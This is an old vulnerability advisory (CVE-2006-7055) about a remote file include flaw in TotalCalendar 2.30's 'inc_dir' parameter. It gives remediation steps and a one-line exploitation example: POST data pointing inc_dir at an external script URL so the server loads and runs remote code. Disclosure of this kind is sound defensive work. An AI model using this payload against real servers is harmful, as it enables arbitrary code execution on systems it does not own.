TotalCalendar 2.30 - Remote File Include Vulnerability
SecurityAlert : 2290 CVE : CVE-2006-7055 SecurityRisk : High (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : David 'Aesthetico' Vieira-Kurz Published : 27.02.2007
Affected Software :
TotalCalendar 2.30
Advisory Content :
[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability
--------------------------------------------------------
Software: TotalCalendar
Version: 2.30
Type: Remote File Include Vulnerability
Date: April, 23th 2006
Vendor: SweetPHP
Page: http://sweetphp.com
Risc: High
Affected Products:
----------------------------
TotalCalendar 2.30 and prior
Description:
----------------------------
TotalCalendar is the complete solution for all of your calendar and
schedule needs.
TotalCalendar gives you the ability to create multiple calendars
and allows you to easily share and manage your events online.
The ability to allow user accounts lets you have other calendar members
help you manage your events,
users, style, and much more.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "inc_dir" parameter in "index.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
inc_dir=http://www.yourspace.com/yourscript.php?
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.